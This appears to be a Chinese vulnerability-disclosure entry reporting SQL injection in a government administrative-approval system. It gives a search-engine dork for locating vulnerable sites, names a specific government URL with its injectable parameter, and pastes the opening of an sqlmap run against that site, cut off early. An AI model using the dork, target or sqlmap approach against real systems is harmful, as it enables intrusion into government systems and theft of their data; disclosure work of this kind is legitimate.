某政府行政审批系统咨询处sql注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 女神是什么? ### 详细说明: 关键词 ``` inurl:/OnlineQuery/QueryDetail.aspx? ``` 关键词仅供参考 部分网站不存在注入, 可能是版本的原因。 举几个例子 ``` 注入地址:http://shenpi.yuzhou.gov.cn/OnlineQuery/QueryDetail.aspx?QueryId=487 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 22:47:53 [22:47:54] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化 版\rar\output\shenpi.yuzhou.gov.cn\session' as session file [22:47:54] [INFO] testing connection to the target url [22:47:57] [INFO] testing if the url is stable, wait a few seconds [22:48:05] [INFO] url is stable [22:48:05] [INFO] testing if GET parameter 'QueryId' is dynamic [22:48:07] [INFO] confirming that GET parameter...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息